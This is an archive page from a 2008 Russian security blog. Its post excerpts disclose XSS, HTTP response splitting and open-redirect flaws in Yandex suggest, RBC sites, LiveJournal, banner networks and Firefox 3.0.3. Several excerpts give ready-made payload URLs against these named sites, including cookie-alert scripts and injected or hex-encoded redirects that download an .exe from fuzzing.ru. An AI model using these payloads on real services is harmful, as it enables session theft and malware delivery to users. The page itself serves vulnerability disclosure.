Архив раздела 'Уязвимости'

Уязвимости баннерных сетей (Яндекс, Mail.ru, РБК)

Опубликовано admin on Ноябрь 18th, 2008 filed in Уязвимости

Речь в данном посте пойдет про внутренние системы рекламы (ротации баннеров).
Проще говоря уязвимость представляет из себя XSS-атаку выполняемую через распространенную технику сбора статистики показов и переходов для flash-баннеров.
Общепринятым для подобных систем является использование совершенно примитивной конструкции, причем (в том числе широкоизвестные рекламные агентства, но они нам в данном контексте неинтересны) её упоминают в требованиях к баннерам. Вот эта […]

Читать полностью..>>

Persistent Cross Site Scripting - livejournal.com

Опубликовано admin on Ноябрь 13th, 2008 filed in Уязвимости

 Ранее сообщалось о проблемах у ведущих блогхостингов. Небольшие детали.
Livejournal.com  
Приложение: /editjournal.bml, /update.bml
Пример приведу на сей раз на скриншоте

Читать полностью..>>

Серьезная уязвимость в Mozilla Firefox 3.0.3 Gecko/20080201

Опубликовано admin on Ноябрь 12th, 2008 filed in Уязвимости

 
Сразу оговорюсь, что указанная версия по сообщениям самого браузера является актуальной и обновлений для неё нет. Поэтому, как минимум для неё, информация актуальна. 
Описание: Браузер данной версии позволяет выполнять следующую операцию.
window.self = window.top;
В итоге это может привести к подделке структуры окон при использовании фреймов. Т.е. используя тот факт что свойство window.self работает не только как getter, но и как setter […]

Читать полностью..>>

Масштабные проблемы у ведущих блогхостингов и почтовых систем.

Опубликовано admin on Ноябрь 12th, 2008 filed in Уязвимости

Уязвимости подвержены множество самых популярных систем ведения блогов и некоторые почтовые системы.

Тип уязвимости: Межсайтовое выполнение сценариев (Persistent Cross Site Scripting). Недостаточная фильтрация содержимого.
Приложение: Формы обработки записей и комментариев, как правило.

Ввиду чрезвычайно высокого масштаба данной уязвимости и очень опасных последствий её эксплуатации названия конкретных сервисов и конкретные способы эксплуатации я опускаю. Упомяну лишь, что в контексте […]

Читать полностью..>>

Вновь об уязвимостях проектов РосБизнесКонсалтинга

Опубликовано admin on Октябрь 29th, 2008 filed in Уязвимости

Обновление: новые примеры, предыдущие исправлены.
Берем первый попав?ийся мне вариант, где файл отдает некий скрипт (прямой редирект на файл вроде исправили).
http://www.rbc.ru/bredir/?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31
http://banner.rbc.ru/banredir.cgi?code=!%66%72%61%74%72%69%61%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%41%75%64%69%6F%2F%69%6E%64%65%78%2E%63%67%69%3F%73%6F%6E%67%3D%33%34%32%32%34%26%77%61%76%3D%31
Встретить в сети нормально организованный скриптовый редирект очень непросто, подавляющее боль?инство представляют из себя серьезную уязвимость.

Тип уязвимости: Переадресация URL.
Приложение: http://www.rbc.ru/bredir/, http://banner.rbc.ru/banredir.cgi, http://www.rbc.ru/3e/9jjjgygaf/click
GET-переменные: code

Примеры:
http://www.rbc.ru/bredir/?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65
http://banner.rbc.ru/banredir.cgi?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65
http://www.rbc.ru/3e/9jjjgygaf/click?code=!%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65

Тип уязвимости: ?ндексирование директорий (Directory Indexing), как следствие -> Раскрытие исходного кода (Source code […]

Читать полностью..>>

Множественные уязвимости проектов РосБизнесКонсалтинга

Опубликовано admin on Октябрь 22nd, 2008 filed in Уязвимости

Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /
GET-переменные: нет

Примечание: Уязвимость вызвана отсутствием фильтрации (или кодирования) исходного URL. Работает только во всех версиях Internet Explorer.
Возможные области применения (приведены простые примеры):

Распространение вредоносного ПО - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.location.replace(’http://fuzzing.ru/%62%6C%6F%67/%66%69%6C%65%73/FirefoxSetup.exe’);</script>
Подмена содержимого страницы - http://top.rbc.ru/incidents/22/10/2008/254898.shtml?fuzzing.ru=">test</a><script>document.body.innerHTML=’<h1>Fuzzing.ru’</script>

 Приведенные примеры очень грубые. Без сомнений можно полагать, что качественная эксплуатация данных уязвимостей является […]

Читать полностью..>>

Обновление :: Исправление уязвимостей suggest.yandex.ru

Опубликовано admin on Октябрь 20th, 2008 filed in Уязвимости

По факту исправлений понятно, что исправлено лишь расщепление HTTP-запроса. Все остальное работает несколько в другом виде.

http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3E%3C%2F%62%6F%64%79%3E
http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%62%6F%64%79%3E
http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html∂=%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%27%72%65%66%72%65%73%68%27%20%63%6F%6E%74%65%6E%74%3D%27%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%66%75%7A%7A%69%6E%67%2E%72%75%2F%62%6C%6F%67%2F%66%69%6C%65%73%2F%46%69%72%65%66%6F%78%53%65%74%75%70%2E%65%78%65%27%3E%3C%2F%6D%65%74%61%3E

По другим примерам аналог находится чуть более сложно.

Читать полностью..>>

Множественные уязвимости в сервисе поисковых подсказок Яндекса (suggest.yandex.ru)

Опубликовано admin on Октябрь 16th, 2008 filed in Уязвимости

Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.
Приложение: /suggest-ya.cgi
GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>

Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)
Приложение: /suggest-ya.cgi
GET-переменные: ct

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)
Простые примеры применения, не говоря уже о сложных вариантах.

Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru

?спользование уязвимостей других приложений или распостранение вирусов (подмена content-type)

Можно предложить, к примеру, скачать с Яндекса великолепную […]

Читать полностью..>>
« Previous Entries